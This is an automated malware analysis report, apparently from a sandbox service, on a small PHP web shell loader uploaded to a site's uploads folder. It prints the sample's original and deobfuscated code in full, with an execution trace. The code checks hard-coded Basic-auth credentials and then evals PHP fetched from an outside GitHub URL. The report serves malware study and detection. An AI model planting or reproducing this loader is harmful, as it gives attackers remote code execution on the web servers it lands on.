PHP Malware Analysis
nah.pHP
md5: 1636a1281bc0b8fa6d098ab5aebdab9a
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
URLs
- https://raw.githubusercontent.com/Helloween1205/log/main/log.php (Deobfuscated, Original)
Deobfuscated PHP code
<?php
$user = "admin";
$pass = "ex";
if ($_SERVER["PHP_AUTH_USER"] != $user || $_SERVER["PHP_AUTH_PW"] != $pass) {
header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
header("HTTP/1.0 401 Unauthorized");
exit;
}
@null;
@eval("?>" . file_get_contents("https://raw.githubusercontent.com/Helloween1205/log/main/log.php"));Execution traces
data/traces/1636a1281bc0b8fa6d098ab5aebdab9a_trace-1676256600.1774.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:50:26.075247]
1 0 1 0.000161 393512
1 3 0 0.000219 395288 {main} 1 /var/www/html/uploads/nah.pHP 0 0
1 A /var/www/html/uploads/nah.pHP 2 $user = 'admin'
1 A /var/www/html/uploads/nah.pHP 4 $pass = 'ex'
2 4 0 0.000281 395288 header 0 /var/www/html/uploads/nah.pHP 10 1 'WWW-Authenticate: Basic realm="dvildance was here"'
2 4 1 0.000300 395416
2 4 R NULL
2 5 0 0.000314 395384 header 0 /var/www/html/uploads/nah.pHP 12 1 'HTTP/1.0 401 Unauthorized'
2 5 1 0.000329 395448
2 5 R NULL
0.000359 316432
TRACE END [2023-02-13 00:50:26.075478]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
$user = "admin";
$pass = "ex";
if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
{
header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
header("HTTP/1.0 401 Unauthorized");
exit();
}
?>
<? @null;@eval("?>".file_get_contents("https://raw.githubusercontent.com/Helloween1205/log/main/log.php"));?>